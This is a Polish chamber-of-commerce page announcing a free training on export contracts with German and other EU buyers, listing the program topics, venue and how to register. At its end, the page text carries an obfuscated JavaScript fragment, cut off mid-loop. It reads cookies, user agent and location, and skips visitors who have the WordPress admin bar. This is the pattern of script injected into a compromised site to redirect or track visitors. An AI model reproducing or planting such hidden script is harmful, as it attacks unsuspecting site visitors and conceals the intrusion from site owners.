Jak zawierać optymalne kontrakty z krajami UE na przykładzie kontraktu z Niemcami – szkolenie | Północna Izba Gospodarcza w Koszalinie

Zapraszamy Państwa na szkolenie – Jak zawierać optymalne kontrakty z krajami UE na przykładzie kontraktu z Niemcami. Dodatkowo tego dnia, odbędzie się dyżur eksperta, który chętnie udzieli informacji szczegółowych na Państwa pytania związane z zawieraniem kontraktów z krajami UE.

Szkolenie odbędzie się 13 marca o godzinie 10 w Biurze Północnej Izby Gospodarczej w Koszalinie, ul. Racławicka 15-17, budynek „F”, pokój 215 (budynek Politechniki Koszalińskiej).

Szkolenie przeznaczone jest dla osób prowadzących firmy dostarczające towary do Niemiec lub innych krajów Unii Europejskiej oraz pracowników działów eksportu.

Uczestnicy zdobędą wiedzę w zakresie:
• konstrukcji korzystnych i prawnie skutecznych klauzul umownych,
• zabezpieczenia płatności,
• skutecznego zastrzeżenia prawa własności na towarze,
• ograniczenia odpowiedzialności za wady towaru.

Program:

I. Zawieranie umów o dostawę towarów z kontrahentem niemieckim
1. Na co zwrócić uwagę przy zawieraniu umowy o sprzedaż towaru z montażem (okna, drzwi itp.)?
2. Jakie wybrać prawo? Czy polskie prawo jest faktycznie korzystniejsze dla eksportera?
3. Jaki wybrać sąd właściwy do rozstrzygania sporów z umowy?
4. Jakie elementy niezbędne są w umowie dostawy towaru?
5. W jaki sposób regulować klauzulę transportu?
6. Kiedy mimo przypadkowego zniszczenia towaru „po drodze” sprzedawca zachowuje prawo do zapłaty ceny?
7. Dlaczego większość klauzul zastrzeżenia prawa własności na towarze nie zabezpiecza praw sprzedającego? Jak formułować tego typu klauzule?
8. Termin dostawy: na jakie sformułowania wymagane przez kontrahenta należy zwrócić szczególną uwagę?
9. Na jaką wysokość kary umownej z tytułu zwłoki w dostawie nie należy się zgadzać

II. Założenie firmy w Niemczech
1 Zalety marketingowe i praktyczne założenia spółki w Niemczech
2 Formalności i koszty założenia
3 Podatki w Niemczech
4. Koszty pracowników w Niemczech,

III. Inkubator Przedsiębiorczości dla polskich firm w Niemczech

Udział w spotkaniu jest bezpłatny wyłącznie po uprzednim potwierdzeniu uczestnictwa.

Potwierdzenie obecności prosimy wysyłać na adres koszalin@izba.info lub telefonicznie do naszego biura 94 341 10 83. 

Istnieje możliwość zmiany spotkania i dyżuru eksperta na godziny popołudniowe – jeżeli są Państwo zainteresowani, bardzo prosimy o kontakt. 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m